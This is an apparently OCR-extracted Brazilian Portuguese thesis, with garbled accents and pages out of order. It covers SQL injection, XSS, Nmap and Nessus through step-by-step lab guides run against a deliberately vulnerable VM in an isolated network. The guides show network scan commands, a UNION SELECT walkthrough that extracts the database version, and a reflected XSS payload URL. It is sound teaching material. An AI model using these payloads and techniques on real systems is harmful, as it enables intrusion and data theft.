105. nibilidade das informa es ao restringir o n mero de usu rios e processos que acessam determinados tipos de informa es e Garantir sigilo das informa es que nao podem chegar a usu rios sem a devida autoriza o NAKAMURA GEUS 2007 375 3 Principais falhas de injec o encontradas na seguranca computacional Neste cap tulo ser o abordados os dois principais problemas de inje o que mais afetam as aplica es web segundo os dados levantados pela OWASP C 2012 39 3 1 SQL Injection O que SQL Injection Segundo a definic o da OWASP D 2011 um ataque de SQL Injection consiste na inser o ou inje o de uma requisi o SQL atrav s de uma entrada de dados de um cliente em uma aplica o Ataques SQL Injection s o um tipo de ataque de injegao nos quais comandos de SQL sao injetados em entradas de dados em texto plano para efetuar a execu o de comandos SQL pr definidos Diferentemente de um ataque Cross Site Scripting XSS que tem como alvo os usu rios um ataque SQL Injection tem como alvo o banco de dados a que uma aplica o est ligada Causas de um ataque SQL Injection Uma ataque SQL Injection poss vel quando uma aplica o utiliza dados que podem ser controlados por um atacante como parte de uma requisic o SQL O atacante pode enviar uma entrada de dados maliciosa de forma que a requisic o enviada ao banco de dados ser interpretada de uma forma diferente da
106. ns casos a exist ncia de um firewall bloqueando pacotes do tipo SYN mas aceitando pacotes do tipo ACK pode fazer os resultados serem mais claros na op o Situa o 4 Suponha que voc queira descobrir os hosts da rede voc sabe que podem existir firewalls bloqueando o caminho Caso os pacotes do Nmap encontrem um firewall a resposta pode ser comprometida e n o condizer com a realidade Sabendo disso voc precisa maximizar as chances de obter bons resultados J vimos aqui que a op o pode ser uma alternativa a op o PS para driblar algum firewall que esteja bloqueando pacotes do tipo TCP SYN Entretanto ainda pode ser prov vel que pacotes do tipo TCP ACK enviados por engano o que no nosso caso proposital sejam ignorados e despachados Para aumentar ainda mais as chances de detectar os hosts da nossa rede podemos utilizar ainda a op o de pacotes UDP Alguns firewalls est o programados apenas para ignorarem e descartarem pacotes TCP mas n o pacotes UDP Desta forma a op o PU pode ser uma alternativa para a nossa detec o 5 Fa a o teste com o comando nmap PU v 192 168 6 1 24 A sondagem UDP normalmente realizada em uma porta alta que provavelmente estar fechada e deve causar um pacote ICMP de porta inalcan vel como resposta Isso diz ao NMAP que a m quina est ativa e dispon vel Entretanto isso n o nos d nenhuma garantia de que conseguimos detectar todos os hosts da rede com su
107. o 7 Considera es finais A partir do levantamento de dados realizados durante este trabalho foi poss vel perceber a import ncia e necessidade do uso de seguran a computacional em prol das atividades e procedimentos realizados em nosso dia a dia Com o aumento do uso de aplicativos para web varejo online o crescimento da utiliza o de tecnologia computacional para fins governamentais e sociais a seguran a 126 computacional torna se indispensavel para o sucesso desta evolucao As falhas de inje o tornaram se grandes vilas deste cen rio no qual os servi os online sao cada vez mais frequentes Visto a necessidade da aplica o de seguran a computacional torna se not rio a import ncia de estudos aperfei oamentos e cria o de novas tecnologias nesta rea O uso de ferramentas para analisar e gerenciar a seguran a computacional de aplica es terminais e at redes inteiras torna se indispens vel como forma de preven o contra vulnerabilidades que podem trazer preju zos de diversas propor es para estes alvos Visto que estas ferramentas de an lise podem ser usadas tanto para objetivos nobres quanto para objetivos maliciosos a descoberta de falhas e vulnerabilidades por pessoas mal intencionadas pode ser catalisada com tais ferramentas Portanto vulnerabilidades de todos os n veis de gravidade merecem aten o O uso da virtualiza o para a realiza o dos testes e experimentos mostrou se satisfat
108. o IP do endere o http 192 168 6 131 test php linklocation index html gt lt script gt alert Teste de XSS Refletido lt script gt lt a href index html 125 Note que um alerta surgiu na tela antes de o link ser mostrado o que significa que conseguimos executar um JavaScript ao acessar a p gina simplesmente acoplando o JavaScript ao endere o de acesso lt a href http 192 168 6 131 test php linklocation index html gt lt script gt alert Teste de XSS Refletido lt script gt lt a href index html gt Link lt a gt Figura 47 Forma o do c digo da p gina atacada ap s um ataque XSS Na figura 47 podemos visualizar a forma o do c digo da p gina O c digo em preto representa o texto inserido pelo navegador enquanto que o c digo em vermelho o texto digitado pelo usu rio A inser o de um fechamento de tag gt logo ap s index html indica o fechamento da tag lt a href permitindo a inser o sequencial de um c digo JavaScript atrav s da tag lt script gt Ao final repare que a abertura e fechamento de tags ajustam se perfeitamente produzindo um c digo consistente O sucesso dessa requisi o representa que podemos por exemplo inserir um c digo JavaScript que referencia outro c digo JavaScript externo o qual n o precisa estar contido no link de forma a n o deix lo muito longo Parte do link pode ainda ser codificada de modo a impedir a leitura e compreens o pelo usu ri
109. oi utilizado 61 Arquitetura modular A arquitetura cliente servidor permite instalar o scanner servidor e conectar se interface gr fica do usu rio cliente por interm dio de um navegador Compat vel com CVE CVE Common Vulnerabilities and Exposures um dicion rio de informa es p blicas de seguran a com escopo internacional e gratuito A maioria dos plugins se conecta ao CVE para que os administradores possam recuperar mais informa es sobre vulnerabilidades publicadas As refer ncias ao Bugtraq BID OSVDB Open Source Vulnerability Database e alertas de seguran a dos fornecedores tamb m s o incorporadas com frequ ncia Arquitetura de plugin Os testes de seguran a s o realizados por meio de plugins externos Dessa forma poss vel adicionar facilmente novos testes de cria o pr pria ou selecionar plugins espec ficos existentes A lista completa dos plugins do Nessus est dispon vel em TENABLE E 2012 NASL O scanner Nessus utiliza NASL Nessus Attack Scripting Language uma linguagem criada especificamente para cria o de testes de seguran a Banco de dados de vulnerabilidades de seguran a atualizado poss vel consultar as verifica es de seguran a mais recentes em TENABLE E 2012 Compatibilidade entre plugins Os testes de seguran a realizados pelos plugins do Nessus impedem que sejam realizadas verifica es desnecess rias Se o servidor de FTP n o permitir logins an nimos
110. omo em um banco de dados f rum de mensagens log de visitantes ou em um campo de coment rios Assim a v tima recebe o c digo malicioso do servidor quando ela solicita a informa o armazenada 47 e Refletidos Reflected S o os ataques nos quais o c digo injetado refletido dos servidores web como em uma mensagem de erro resultado de pesquisa ou qualquer outra resposta que inclua alguma parte ou toda a entrada enviada ao servidor como parte da requisi o Ataques refletidos de XSS s o entregues s v timas atrav s de outros caminhos como uma mensagem de e mail por exemplo Quando o usu rio clica em um link malicioso ou submete um formul rio malicioso o c digo injetado viaja at o servidor web vulner vel que reflete o ataque de volta ao navegador do usu rio O navegador ent o executa o c digo porque este veio de um servidor confi vel Existe ainda outro tipo de ataque XSS pouco conhecido que baseado em Document Object Model DOM e modifica o ambiente DOM do navegador da v tima Document Object Model uma interface livre de plataforma e linguagem que permite que programas e scripts acessem dinamicamente e atualizem o conte do a estrutura e o estilo de documentos no browser do usu rio World Wide Web Consortium 2012 Um ataque XSS um ataque de inje o bem como o SQL Injection entretanto a principal diferen a entre esses ataques que um ataque Cross Site Scripting tem como alvo o usu rio enq
111. onhe a o n mero de m quinas existentes na rede e os seus endere os IPs Suponha tamb m que a rede de sua propriedade e que n o h problema nenhum varrer a rede a procura de hosts ativos Nesta situa o iremos disparar uma busca de hosts por toda a faixa de IPs em que as m quinas virtuais podem estar alocadas Para isso iremos utilizar outro tipo de endere amento chamado de CIDR Neste tipo de endere amento iremos passar ao Nmap um endere o base seguido do n mero de bits que o Nmap deve manter no in cio do endere o variando os outros bits As nossas m quinas virtuais ser o alocadas pelo VMware por padr o no intervalo de IP de 192 168 6 0 at 192 168 6 255 Desta forma iremos manter sempre o endere o base 192 168 6 X e variar o X para a nossa varredura Como cada posi o no endere o IP ocupa 8 bits no endere amento ent o o nosso X final ir ocupar tamb m 8 bits como mostra a figura 11 192 168 6 X Nf Rf cx y 8 bits 8 bits 8 bits 8 bits Figura 11 Endere o das m quinas virtuais Desta forma o endere o que iremos varrer ser 192 168 6 1 24 82 O ultimo numero digitado 1 sera ignorado pelo Nmap uma vez que ele ira realizar uma varredura para cada combina o dos ltimos 8 bits poss veis O numero 24 indica que iremos fixar os primeiros 24 bits e variar o restante de um total de 32 bits Uma forma alternativa de se especificar uma faixa de endere os atrav s do uso do tra o Ex 192 168 6 1
112. os de presta o de servi o Fa a o download da op o Ubuntu 11 10 32 bits Nessus 5 0 0 ubuntu1110 i386 deb 24668 KB Em um terminal v at o diret rio onde est o pacote deb e digite sudo dpkg i Nessus 5 0 0 ubuntu1110_i386 deb senha root labtest voc dever ver uma tela como mostrada na figura 21 93 labtestQubuntu DesktopS sudo dpkg i Nessus 5 0 0 ubuntu1110 i386 deb sudo password for labtest Reading database 147278 files and directories currently installed Preparing to replace nessus 5 0 0 using Nessus 5 0 0 ubuntu1110 i386 deb SShutting down Nessus Unpacking replacement nessus Setting up nessus 5 0 0 nessusd Nessus 5 0 0 build R23018 for Linux C 1998 2012 Tenable Network Security Inc Processing the Nessus plugins HEURE EHE HE HUI E HU EH E E E UG E HE HU E HG HG I GEI A ALL plugins loaded You can start nessusd by typing etc init d nessusd start Then go to https ubuntu 8834 to configure your scanner Processing triggers for ureadahead Figura 21 Instala o do Nessus 4 No terminal inicie o Nessus servidor digitando sudo etc init d nessusd start 5 Em um navegador web digite https ubuntu 8834 para acessar a interface Web Server do Nessus e em seguida clique em Get Started como mostrado na figura 22 Welcome to Nessus 5 Thank you for installing Nessus the world leader in vulnerability scanners Nessus will allow you to p
113. ows mais utilizados durante um maior per odo de tempo por grande parte da popula o Segundo dados coletados da Wikipedia por Gregg 2008 p 32 a Microsoft vendeu mais de 1 milh o de c pias do Windows XP em 2006 Al m disso o sistema Windows XP mais leve e requer 75 menos recursos computacionais do que seus sucessores para executar Como vamos instalar os sistemas operacionais em m quinas virtuais com o intuito de realizar testes espec ficos que n o requerem grande poder de processamento computacional e de port las depois devemos nos preocupar com o desperd cio de recursos como o espa o requerido para a instala o do sistema e a quantidade m nima requerida de mem ria para a opera o por exemplo J para a escolha da distribui o Ubuntu como sistema operacional Linux destacamos a crescente utiliza o e popularidade desta distribui o al m da velocidade com que a comunidade Ubuntu avan a em seu desenvolvimento Para o sistema Windows XP nenhum mecanismo de defesa tais como antiv rus ou firewalls adicionais ser o instalados pois podem interferir no resultado dos testes a serem realizados identificando uma amea a a qual estamos simulando propositalmente para nossos estudos Apenas o firewall incluso no Windows XP ser utilizado como parte dos testes A m quina virtual CentOS5 2small CTF6 Capture The Flag 6 n o parte do desenvolvimento deste trabalho mas ser utilizada para auxiliar nos testes
114. phall e ao Professor Dr Jo o Bosco Mangueira Sobral por terem aceitado participar da minha banca examinadora Aos amigos que tiveram paci ncia e foram compreensivos durante toda a fase de desenvolvimento deste trabalho E em especial Isis M ller e ao Marcelo Braga que acompanharam este trabalho de perto e me deram todo o apoio que precisei durante todo o trajeto Tu te tornas eternamente respons vel por aquilo que cativas Antoine de Saint Exup ry RESUMO O trabalho destaca e descreve dois dos principais problemas de inje o encontrados na literatura e no dia a dia das organiza es relativos seguran a computacional e duas das principais ferramentas utilizadas na an lise de seguran a computacional Cada problema e ferramenta estudada separadamente e possui um roteiro laboratorial pr tico associado conduzindo o indiv duo por uma experi ncia dentro de um ambiente virtual controlado e preparado para a realiza o do laborat rio em um esquema passo a passo Nestes roteiros laboratoriais o indiv duo faz uso de ambientes virtualizados preparados especialmente para este fim Desta forma o maior n mero poss vel de vari veis controlado dentro do ambiente o que permite resultados para os testes mais limpos e potencialmente livres da interfer ncia de fatores externos A id ia da utiliza o dos roteiros laboratoriais uma forma de mostrar na pr tica ao indiv duo os conceitos aprendidos na teoria permi
115. quina virtual VMware seria uma boa escolha para laborat rios pois permite testar com facilidade ferramentas de seguran a testar upgrades e estudos de exames de certifica o 70 O uso e aplica o da virtualiza o pode se estender a diversas reas e n o se limitar apenas a pesquisa e ensino de seguran a computacional M quinas e redes virtuais podem ser utilizadas em outros campos da ci ncia da computa o como por exemplo na implementa o de algoritmos de clusters sem a necessidade de m ltiplos sistemas f sicos As configura es das m quinas virtuais ficam armazenadas em arquivos na m quina hospedeira permitindo que com facilidade estes arquivos sejam copiados a fim de clonar a m quina virtual Essa pr tica pode ser muito til para a cria o e restaura o de backups durantes testes com a m quina virtual oferecendo mais flexibilidade para testes que podem comprometer a m quina virtual durante o aprendizado do aluno Diferentes m quinas virtuais podem se comunicar em uma m quina hospedeira atrav s de uma rede virtual e podem ainda se comunicar com a rede mundial de computadores utilizando a interface de rede da m quina hospedeira Em ambientes de teste e educa o pode ser interessante desconectar as m quinas virtuais da Internet a fim de se criar uma rede isolada para experimenta o Essa configura o particularmente importante quando se usa as m quinas virtuais e suas redes virtuais para testes peri
116. r Voc perceber que ao incrementar para o n mero 8 a p gina n o mostrar mais o post do usu rio Desta forma podemos concluir que a p gina utiliza apenas 7 tabelas para gerar a p gina Em seguida iremos utilizar a cl usula UNION para descobrir algumas informa es do banco de dados 7 Na hackbar apague a cl usula order by seguida do n mero v at o menu SQL e clique em Union select statement Digite o numero de tabelas que encontramos no nosso caso 7 Veja o caminho na figura 39 114 lt n may O 192 168 6 135 id 01 order by 8 QQoisable A Cookies 55 Forms E images information L Miscellaneous INT v 501 x557 Encryption Encoding Other 4 Load URL ht MySQL gt SELECT 1 2 3 4 5 6 7 MSSQL gt do Split URL Oracle r Union select statement b Execute Spaces to inline comments Union select statement Figura 39 Caminho para executar o comando Union select statement na hackbar 8 Clique em Execute para processar a instru o Podemos ver que agora a p gina exibe alguns n meros Estes n meros s o as colunas vulner veis as quais podemos explorar Vamos utilizar por exemplo a coluna de n mero 2 para obter a vers o do MySQL utilizado 9 Substitua o n mero 2 da cl usula UNION SELECT por version e clique em Execute Veja que o n mero 2 foi substitu do por 5 0 45 Esta a vers o do MySQL
117. r version for the right syntax to use near Figura 5 Exemplo de erro nao tratado BRINHOSA R B WESTPHALL C B WESTPHALL 2011 p 5 Levando em considera o as informa es citadas por Clarke e pela OWASP inferimos que um atacante diante de um sistema vulner vel a falhas de inje o SQL pode entre outras a es utilizar se dos meios de entrada de dados para injetar c digo SQL malicioso junto aos dados a fim de alterar a sem ntica das requisi es SQL e consequentemente manipular informa es no banco de dados da aplica o As informa es podem ser inseridas modificadas ou at apagadas A ocorr ncia deste fato pode resultar na incoer ncia das informa es contidas no banco de dados e significar em grandes perdas para institui es e organiza es Como evitar ataques SQL Injection Segundo Clarke 2009 p 13 existem algumas situa es as quais podem ser pontos de vulnerabilidade em sistemas que utilizam a linguagem SQL e Constru o de Strings Din micos uma t cnica de programa o que permite ao desenvolvedor construir instru es SQL dinamicamente em tempo 42 de execu o Desta forma poss vel criar aplica es de prop sito geral mais flex veis Entretanto a mesma flexibilidade que pode facilitar a cria o de instru es din micas pode se tornar um problema caso as requisi es n o sejam parametrizadas Requisi es parametrizadas s o requisi es que possuem um ou mais par m
118. ra 77 As configura es de cada inst ncia de maquina virtual copiada ser o as mesmas das m quinas utilizadas como base mas a medida que estas forem sofrendo altera es cada c pia da m quina virtual ir manter suas novas configura es Basicamente iremos criar uma rede virtual formada por m quinas virtuais em nosso host hospedeiro O VMware ir automaticamente alocar as m quinas virtuais inicializadas em uma faixa de IPs de modo que todas as m quinas virtuais possam ser encontradas na rede 6 Roteiros laboratoriais Neste cap tulo iremos realizar alguns roteiros laboratoriais com o intuito de realizar alguns testes e experimentos relacionados com os assuntos vistos nos cap tulos 3 e 4 destes trabalho Para a realiza o dos roteiros necess ria a leitura pr via da se o diretamente relacionada com o assunto do roteiro pois muitos dos conceitos utilizados neste cap tulo est o explicados nos cap tulos 3 e 4 6 1 Scanner de Rede Utilizando o NMAP Objetivos e Descobrir os hosts ativos da rede e Varrer os hosts descobertos a procura de portas abertas e Realizar as a es anteriores de diferentes formas em diferentes contextos Pr Requisitos e Leitura da se o 4 1 Scanner de Rede NMAP e Execu o simult nea de pelo menos 1 m quina virtual Windows e 1 m quina virtual Ubuntu para a realiza o dos testes 78 Neste roteiro iremos focar nas principais fun es do NMAP que a varredura d
119. rallel DNS resolution of 1 host at 16 15 0 16s elapsed Initiating SYN Stealth Scan at 16 15 Scanning Z hosts 1000 ports host Completed SYN Stealth Scan against 192 168 6 2 1 39s 1 host left Discovered open port 902 tcp on 192 168 6 1 Discovered open port 912 tcp on 192 168 6 1 Completed SYN Stealth Scan at 16 15 4 75s elapsed 2000 total ports Nmap scan report for 192 168 6 1 Host is up 0 0094s latency Not shown 998 filtered ports PORT STATE SERVICE 902 tcp open iss realsecure 912 tcp open apex mesh MAC Address 00 50 56 C0 00 08 VMware Figura 16 Exemplo 3 de sa da do NMAP Similarmente a esta op o o Nmap oferece tamb m a op o PA que ao inv s de enviar pacotes do tipo TCP SYN envia pacotes do tipo TCP ACK Neste contexto os pacotes do tipo TCP ACK indicam uma confirma o do recebimento de dados de uma conex o TCP estabelecida quando na verdade n o existe nenhuma conex o estabelecida com o alvo Desta forma o alvo deve responder ao pacote TCP ACK com um pacote RST para encerrar a conex o como mostra a figura 17 entretanto esta a o revela a exist ncia do alvo caso ele exista e esteja ativo na rede NMAP Alvo n o reconhece conex o TCP TCP ACK Figura 17 Exemplo 4 de comunica o do NMAP com o alvo 87 4 Fa a o teste varrendo a rede com o comando nmap v 192 168 6 1 24 Os resultados devem ser similares aos da varredura pela op o 5 Entretanto em algu
120. realizados pelas outras m quinas Para o processo de virtualiza o iremos utilizar o software VMware em sua vers o 4 0 2 build 591240 E na constru o das m quinas virtuais iremos utilizar as configura es padr es sugeridas pelo VMware exceto pela configura o de mem ria RAM a qual iremos configur la para 512MB em todas as m quinas pois um fator limitante para o n mero de m quinas virtuais que conseguimos executar simultaneamente 76 Windows XP Professional State Suspended OS Windows XP Professional Version Workstation 8 0 virtual machine RAM 512 MB Ep Play virtual machine p Edit virtual machine settings Figura 8 Cen rio de m quinas virtuais Para a simulac o de uma rede de computadores para efetuar os testes iremos utilizar algumas inst ncias das m quinas virtuais Windows XP e Ubuntu criadas e apenas 1 inst ncia da maquina virtual CentOS5 2small que a inst ncia da m quina virtual CTF6 A figura 8 mostra apenas 1 inst ncia de cada m quina mas voc pode fazer c pias das m quinas virtuais Windows XP e Ubuntu para utilizar mais de 1 inst ncia As m quinas virtuais est o configuradas para utilizarem pouca mem ria 512 MB de mem ria RAM com a finalidade de podermos executar um maior n mero de m quinas virtuais ao mesmo tempo O n mero de m quinas virtuais que voc poder executar simultaneamente ir depender dos recursos computacionais de sua m quina hospedei
121. rewall do Windows pode tomar este computador mais vulner vel a v rus e invasores Gerenciar configura es de seguran a para D que mais devo saber sobre o Firewall do Windows Op es da Internet Atualiza es autom ticas e Firewall do Windows Cancelar Microsoft tem um compromisso com a sua 5 Central de Figura 18 Ativa o do Firewall no Windows XP Voc ir notar que desta vez as portas antes detectadas pela varredura n o mais foram detectadas na m quina em que o firewall foi ativado 89 Tarefa 2 Varredura de portas Agora que ja conhecemos os nossos possiveis alvos na rede nao precisamos mais disparar varreduras por toda a rede evitando o desperd cio dos nossos recursos e do nosso tempo Para isso anote os endere os de IPs encontrados em suas varreduras anteriores pois iremos utiliz los novamente aqui Basicamente as t cnicas que utilizamos para o descobrimento de hosts s o as mesmas que iremos utilizar para a varredura de portas Essas t cnicas podem ser inclusive combinadas para que tenhamos uma varredura mais completa como por exemplo TCP e UDP Mas simplesmente ativar todas as op es de busca ao mesmo tempo pode fazer com que o tempo de busca se torne muito alto inviabilizando a nossa varredura Situa o 1 Voc n o tem privil gios de administrador ou root mas quer fazer uma varredura nos hosts descobertos a procura de portas Neste caso voc n o poder utilizar
122. rg register gt Acessado em 8 de Maio de 2012 TENABLE Network Security Inc B Download Dispon vel lt http www nessus org download gt Acessado em 8 de Maio de 2012 TENABLE Network Security Inc C Nessus 5 0 Installation and Configuration Guide 7063 Columbia Gateway Drive Suite 100 Columbia MD 21046 2012 TENABLE Network Security Inc D Nessus 5 0 User Guide 7063 Columbia Gateway Drive Suite 100 Columbia MD 21046 2012 TENABLE Network Security Inc Plugins Dispon vel lt http www nessus org plugins gt Acessado em 8 de Maio de 2012 VACCA John R Computer and Information Security Handbook Edi o John R Vacca Canada Elsevier Inc 2009 ISBN 978 0 12 374354 1 134 VMWare Dispon vel em lt http www vmware com br virtualization virtualization basics what is virtualization html gt Acessado em 23 de Janeiro de 2012 WILLEMS Christian KLINGBEIL Thomas RADVILAVICIUS Lukas CENYS Antanas MEINEL Christoph A Distributed Virtual Laboratory Architecture for Cybersecurity Training 6th International Conference on Internet Technology and Secured Transactions 11 14 December 2011 Abu Dhabi United Arab Emirates 2011 World Wide Web Consortium Document Object Model DOM Dispon vel em lt http www w3 org DOM gt Acessado em 8 de Maio de 2012
123. rio para atingir os objetivos almejados A virtualiza o permitiu com que as c pias das m quinas virtuais originais permanecessem inalteradas em um estado consistente enquanto que c pias utilizadas para a realiza o dos roteiros laboratoriais pudessem sofrer modifica es e at danos Desta forma o aluno pode experimentar na pr tica diversas atividades que seriam danosas caso fossem executadas em um computador de um laborat rio da universidade por exemplo Um ponto negativo do uso da virtualiza o neste trabalho a quantidade de m quinas virtuais que o aluno consegue executar simultaneamente em um computador hospedeiro A escolha de um sistema operacional como o Windows XP ao inv s de seus sucessores ajudou do ponto de vista que ele necessita de menos mem ria para executar permitindo assim que mais m quinas virtuais pudessem ser executadas simultaneamente Mesmo com baixa utiliza o de recursos por m quina 127 virtual a quantidade maxima de m quinas virtuais que conseguimos executar simultaneamente n o muito grande de forma que se quis ssemos fazer mais altera es em diferentes m quinas virtuais para obter diferentes resultados em cada m quina virtual em nossas an lises estar amos limitados a poucas m quinas em um mesmo computador hospedeiro Em rela o aos roteiros laboratoriais para serem executados nestes ambientes virtualizados a cria o de um processo passo a passo e ilustrativo mostrou se bastan
124. ropriamente dito 43 Dependendo do tipo de dado esperado pela entrada em uma aplica o que utiliza SQL pode se criar uma vulnerabilidade como no caso de uma entrada de c digo de usu rio a qual o usu rio deve entrar com um c digo num rico Assim o c digo digitado n o acompanhar caracteres de escape e pode ser um potencial risco para o banco de dados caso a entrada n o for filtrada Manipula o Incorreta de Requisi es Assembly Algumas aplica es complexas precisam ser codificadas com senten as de SQL din micas pois as tabelas ou campos que precisam ser acessados ainda n o s o conhecidos no est gio de desenvolvimento ou ainda n o existem O fato de uma aplica o gerar uma entrada de dados em tempo de execu o faz muitas vezes com que o desenvolvedor confie na entrada de dados gerada Entretanto ela pode ser controlada pelo usu rio se for por exemplo submetida por uma requisi o do tipo GET O atacante pode submeter os seus dados no lugar dos dados gerados pela aplica o realizando assim um ataque de inje o SQL Manipula o Incorreta de Erros Lidar com erros de forma inapropriada pode acarretar uma s rie de problemas de seguran a para um Web site O problema mais comum ocorre quando mensagens de erro internas detalhadas como as que envolvem estruturas de tabelas ou c digo de erros s o mostrados ao usu rio ou atacante Essas mensagens revelam detalhes de implementa o que nunca deveriam ser revel
125. rowser e multiplataforma Desta forma poderemos realizar os testes tanto de m quinas virtuais Windows como Ubuntu pois ambas possuem o browser Mantra instalado Como testes para praticar uma inje o de comandos SQL iremos ganhar acesso de administrador no servidor LAMPSecurity CTF6 sem digitar a senha de administrador 104 para login e posteriormente iremos encontrar uma maneira de obt la para acessos futuros Tarefa 1 Obter acesso de administrador sem digitar a senha Primeiramente procure descobrir em sua rede virtual qual o endere o alocado para o servidor da m quina virtual LAMPSecurity CTF6 Voc pode usar a ferramenta Nmap para descobrir isso facilmente Vamos utilizar como endere o neste roteiro http 192 168 6 135 mas voc deve substitu lo pelo endere o o qual encontrou em sua rede 1 Abra o navegador Mantra e em seguida digite o endere o encontrado para acessar o servidor HTTP do LAMPSecurity CTF6 Ex http 192 168 6 135 2 Clique no menu Log In para acessarmos a tela de autentica o Agora vamos utilizar uma ferramenta inclusa no Mantra chamada SQL Inject me para testar vulnerabilidades de inje o SQL na p gina de login 3 Abra a SQL Inject Me bar seguindo o seguinte caminho Tools gt Application Auditing gt SQL Inject ME gt Open SQL Inject ME Sidebar como mostra a figura 29 New Tab Tools Options Start Private Browsing Ye Bookmarks gt History
126. s o importantes para o aprendizado do aluno O aprendizado obtido em uma aula de laborat rio complementa de forma pr tica os estudos realizados na teoria confrontando a pr tica com a teoria em exerc cios ou experimentos preparados exclusivamente para o objeto em estudo A pr tica em laborat rio permite ainda ao aluno a realiza o de diferentes tipos de testes utilizando as mais diversas combina es de possibilidades al m de auxiliar na fixa o do conte do aprendido A import ncia da constru o e preparo de roteiros laboratoriais que permitem ao aluno seguir uma sequ ncia de atividades definidas n o se d apenas pelo fato de prover estes roteiros de estudo a estes alunos mas todo o processo de cria o e experimenta o destes roteiros configura um cen rio onde muito estudo sobre o tema deve ser feito Consequentemente diversas ferramentas podem ser testadas e avaliadas problemas espec ficos isolados a fim de se descobrir a causa real para determinados problemas e o motivo pelos quais eles acontecem Outro fator importante a ser levado em considera o que muitas vezes cometer um erro como a configura o incorreta de um firewall a instala o de ferramentas de seguran a erradas ou ainda a prote o inadequada de uma rede ou de um conjunto de arquivos em um computador podem causar danos irrevers veis para uma organiza o ou institui o Para que testes n o sejam realizados em ambientes 14 onde n o se
127. s de seguran a emergentes no desenvolvimento de aplica es web CHEN TAO 2011 p 491 Atualmente diversos trabalhos relacionados com o ensino de seguran a utilizando ambientes virtuais est o sendo desenvolvidos Chen e Tao 2011 p 491 desenvolveram uma nova ferramenta de ensino de seguran a para aplica es web chamada SWEET Secure WEb dEvelopment Teaching O prop sito deste projeto refor ar a experi ncia de aprendizado dos estudantes em computa o atrav s de um ambiente padronizado e modular na seguran a de desenvolvimento web T cnicas tradicionais de ensino ex leituras ou literatura tornaram se inapropriadas para o treinamento em cyber seguran a porque o estudante n o pode aplicar os princ pios da abordagem acad mica em um ambiente real stico na sala de aula No treinamento de seguran a ganhar experi ncia pr tica atrav s de exerc cios indispens vel para consolidar o conhecimento A aloca o de um ambiente para a pr tica destes exerc cios imp e um desafio para a pesquisa e desenvolvimento pois os estudantes precisam de acesso privilegiado ao sistema para a realiza o da 73 maior parte dos exerc cios de seguran a Com estes privil gios os estudantes poderiam facilmente destruir os sistemas de treinamento ou mesmo utiliz los para fins inapropriados como ataques ilegais a outros hosts utilizando a rede do campus universit rio ou a Internet WILLEMS KLINGBEIL RADVILAVICIUS CENYS
128. s em ordem sequencial 4 2 Scanner de Vulnerabilidades NESSUS O Nessus uma ferramenta bem conhecida utilizada para realizar varreduras em sistemas computacionais a procura de vulnerabilidades A ferramenta permite ainda realizar auditorias remotas e determinar se a rede foi invadida ou usada de maneira indevida Al m de verificar a presen a de vulnerabilidades poss vel tamb m verificar especifica es de conformidade viola es de pol ticas de conte do e outras anomalias em um computador local TENABLE C 2012 p 6 O Nessus muito utilizado tamb m por administradores de rede e profissionais da rea de seguran a a fim de detectar poss veis vulnerabilidades e falhas em uma rede antes que elas sejam exploradas por pessoas mal intencionadas Estas s o algumas das caracter sticas da ferramenta Nessus de acordo com o guia de instala o da vers o 5 0 fornecido pelo fabricante Varredura inteligente O Nessus n o gera alarmes falsos ou seja o programa n o pressup e que um determinado servi o est sendo executado em uma porta fixa O programa verifica uma vulnerabilidade por meio de explora o sempre que poss vel Nos casos em que isso n o for confi vel ou afetar negativamente o alvo o Nessus conta com um banner de servidor metodologia do Nessus para detectar vulnerabilidades sem prejudicar o alvo para determinar a presen a da vulnerabilidade Nesse caso o relat rio gerado indicar se esse m todo f
129. s por padr o pelo Nessus j est adequado para nossa varredura 12 Por fim clique em Submit para salvar a nova pol tica Pol tica 2 Rede externa 98 1 Siga os mesmos passos da Pol tica 1 apenas mudando o preenchimento de alguns campos 2 No submenu General preencha na rea Basic no campo Name com o nome Rede externa 3 Na rea Scan iremos deixar as seguintes op es marcadas a Allow Post Scan Report Editing Nos permite a edi o do relat rio ap s a varredura b Safe Checks automaticamente faz com que o Nessus desmarque plugins que podem causar algum tipo de dano rede Como iremos varrer uma rede externa a qual desconhecemos importante marcar esta op o c Silent Dependencies N o inclui a lista de depend ncias entre plugins no relat rio da varredura d Avoid Sequential Scans Faz com que a varredura n o seja sequencial caso haja v rios IPs na rede de modo a tentar evitar a detec o da nossa varredura nas redes externas 4 Na rea Network Congestion iremos deixar ambas op es marcadas para que o Nessus administre o congestionamento de tr fego e evite a sobrecarga na rede externa 5 Na area Port Scanners iremos deixar apenas a op o SYN SCAN marcada de modo que o Nessus ir utilizar o Nmap instalado em nossa m quina virtual para efetuar uma varredura silenciosa a procura de portas 6 Na rea Port Scan Options iremos dei
130. seja feita de diferentes formas Save Knowledge Base O scanner Nessus salva as informa es de varredura no banco de dados de conhecimento do servidor Nessus para uso posterior Isso inclui portas abertas plugins utilizados servi os descobertos etc Safe Checks A op o Safe Checks Verifica es Seguras desativa todos os plugins que podem afetar negativamente o host remoto Silent Dependencies Se esta op o for selecionada a lista de depend ncias n o ser inclu da no relat rio 64 e Log Scan Details to Server Salva detalhes adicionais da varredura no log do servidor Nessus nessusd messages incluindo a ativa o ou encerramento do plugin ou se um plugin foi interrompido O log resultante pode ser usado para confirmar se determinados plugins foram usados e se os hosts foram examinados e Stop Host Scan on Disconnect Ao marcar esta op o o Nessus cessar a varredura se detectar que o host parou de responder Isso pode ocorrer se os usu rios desligarem seus PCs durante uma varredura se um host parar de responder ou se o mecanismo de seguran a por exemplo IDS bloqueou o tr fego para um servidor Se as varreduras continuarem nesses computadores o tr fego desnecess rio ser enviado e atrasar a verifica o e Avoid Sequential Scans Normalmente o Nessus verifica uma lista de endere os IP em sequ ncia Se esta op o estiver marcada o Nessus verificar a lista de hosts em ordem aleat ria Isto pode s
